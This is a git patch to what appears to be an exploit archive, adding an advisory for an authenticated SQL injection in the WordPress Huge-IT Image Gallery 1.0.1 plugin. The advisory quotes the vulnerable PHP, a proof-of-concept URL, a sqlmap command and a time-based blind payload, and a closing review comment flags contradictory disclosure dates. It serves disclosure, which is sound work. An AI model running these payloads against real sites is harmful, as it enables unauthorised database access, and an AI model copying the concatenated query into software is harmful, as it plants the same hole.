From dd650d9bb98b1dd7db2ed31452f468fcc5687a09 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Thu, 4 Sep 2014 04:43:14 +0000
Subject: [PATCH] Updated 09_04_2014
---
 files.csv | 5 +-
 platforms/php/webapps/34524.txt | 94 +++++++++++++++++++++++++++++++++
 2 files changed, 97 insertions(+), 2 deletions(-)
 create mode 100755 platforms/php/webapps/34524.txt
diff --git a/files.csv b/files.csv
index 40d157489..72b6ed4ae 100755
--- a/files.csv
+++ b/files.csv
@@ -15784,7 +15784,7 @@ id,file,description,date,author,platform,type,port
 18231,platforms/php/webapps/18231.txt,"Wordpress UPM-POLLS Plugin 1.0.4 - Blind SQL Injection",2011-12-11,Saif,php,webapps,0
 18232,platforms/php/webapps/18232.txt,"FCMS_2.7.2 cms and earlier multiple CSRF Vulnerabilities",2011-12-11,"Ahmed Elhady Mohamed",php,webapps,0
 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0
-18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0
+18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0
 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0
 18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 Authentication Bypass / Remote Code Execution Exploit",2011-12-13,metasploit,php,webapps,0
 18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0
@@ -31088,8 +31088,9 @@ id,file,description,date,author,platform,type,port
 34514,platforms/php/webapps/34514.txt,"WordPress Slideshow Gallery Plugin 1.4.6 - Shell Upload Vulnerability",2014-09-01,"Jesus Ramirez Pichardo",php,webapps,80
 34517,platforms/windows/remote/34517.rb,"Wing FTP Server Authenticated Command Execution",2014-09-01,metasploit,windows,remote,5466
 34518,platforms/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / RCE",2014-09-01,"Pedro Ribeiro",jsp,webapps,0
-34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400
+34519,platforms/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities",2014-09-01,"Hans-Martin Muench",jsp,webapps,8400
 34520,platforms/linux/dos/34520.txt,"Oracle MySQL <= 5.1.48 'HANDLER' interface Denial Of Service Vulnerability",2010-08-20,"Matthias Leich",linux,dos,0
 34521,platforms/linux/dos/34521.txt,"Oracle MySQL Prior to 5.1.49 Malformed 'BINLOG' Arguments Denial Of Service Vulnerability",2010-08-20,"Shane Bester",linux,dos,0
 34522,platforms/linux/dos/34522.txt,"Oracle MySQL Prior to 5.1.49 'DDL' Statements Denial Of Service Vulnerability",2010-07-09,"Elena Stepanova",linux,dos,0
 34523,platforms/multiple/remote/34523.txt,"Nagios XI 'users.php' SQL Injection Vulnerability",2010-08-24,"Adam Baldwin",multiple,remote,0
+34524,platforms/php/webapps/34524.txt,"Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection",2014-09-02,"Claudio Viviani",php,webapps,80
diff --git a/platforms/php/webapps/34524.txt b/platforms/php/webapps/34524.txt
new file mode 100755
index 000000000..f0eef8ce2
--- /dev/null
+++ b/platforms/php/webapps/34524.txt
@@ -0,0 +1,94 @@
+######################
+# Exploit Title : Wordpress Huge-IT Image Gallery 1.0.1 Authenticated SQL Injection
+
+# Exploit Author : Claudio Viviani
+
+# Vendor Homepage : http://huge-it.com/
+
+# Software Link : http://downloads.wordpress.org/plugin/gallery-images.zip
+ Mirror Link : https://mega.co.nz/#!3EoUzSQI!yrl75XQsp1ggxDCjW-wq7yUxLdbLu0WHPNFcJAxJOHs
+
+# Date : 2014-08-25
+
+# Tested on : Windows 7 / Mozilla Firefox
+# Linux / Mozilla Firefox
+# Linux / sqlmap 1.0-dev-5b2ded0
+
+######################
+
+# Location :
+http://localhost/wp-content/plugins/gallery-images/admin/gallery_func.php
+
+######################
+
+# Vulnerable code :
+
+function editgallery($id)
+ {
+
+ global $wpdb;
+
+ if(isset($_GET["removeslide"])){
+ if($_GET["removeslide"] != ''){
+
+
+ $wpdb->query("DELETE FROM ".$wpdb->prefix."huge_itgallery_images WHERE id = ".$_GET["removeslide"]." ");
+
+
+
+ }
+ }
+
+######################
+
+# PoC Exploit:
+
+http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1 and 1=2
+
+
+# Exploit Code via sqlmap:
+
+sqlmap --cookie="INSERT_WORDPRESS_COOKIE_HERE" -u "http://localhost/wordpress/wp-admin/admin.php?page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=1" \
+-p removeslide --dbms=mysql --level 3
+
+[20:38:20] [INFO] GET parameter 'removeslide' is 'MySQL >= 5.0 time-based blind - Parameter replace' injectable
+...
+...
+...
+---
+Place: GET
+Parameter: removeslide
+ Type: AND/OR time-based blind
+ Title: MySQL >= 5.0 time-based blind - Parameter replace
+ Payload: page=gallerys_huge_it_gallery&task=edit_cat&id=1&removeslide=(SELECT (CASE WHEN (5440=5440) THEN SLEEP(5) ELSE 5440*(SELECT 5440 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))
+---
+
+
+# PoC Video:
+
+https://www.youtube.com/watch?v=gAmb0_o3ZUc
+
+######################
+
+# Vulnerability Disclosure Timeline:
+
+2014-08-25: Discovered vulnerability
+2014-08-26: Vendor Notification (Web Customers Service Form)
+2014-08-26: No Response/Feedback
+2014-08-01: Plugin version 1.0.1 released without fix
+2014-08-02: Public Disclosure
+
+#####################
+
+Discovered By : Claudio Viviani
+ http://www.homelab.it
+
+ info@homelab.it
+ homelabit@protonmail.ch
+
+ https://www.facebook.com/homelabit
+ https://twitter.com/homelabit
+ https://plus.google.com/+HomelabIt1/
+ https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
+
+#####################
\ No newline at end of file
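Review bot: The disclosure timeline in this new advisory is internally inconsistent: `2014-08-01: Plugin version 1.0.1 released without fix` and `2014-08-02: Public Disclosure` are dated before the 2014-08-26 vendor-notification entries they follow, and the files.csv row added in the same patch dates the entry 2014-09-02, so these two lines are presumably meant to read 2014-09-01 and 2014-09-02 and should be confirmed with the author before indexing. The quoted `editgallery()` excerpt makes the root cause clear (`$_GET["removeslide"]` concatenated directly into a DELETE statement) but the advisory offers no remediation guidance for site owners or the plugin maintainer; a short line under the vulnerable-code section such as `# Fix: pass the id through $wpdb->prepare() with a %d placeholder (or absint()) rather than string concatenation` would make the entry more useful to defenders. Since the handler lives under wp-admin and the sqlmap invocation requires a WordPress cookie, the "Authenticated" qualifier in the title is the key risk context and could be stated explicitly alongside the timeline.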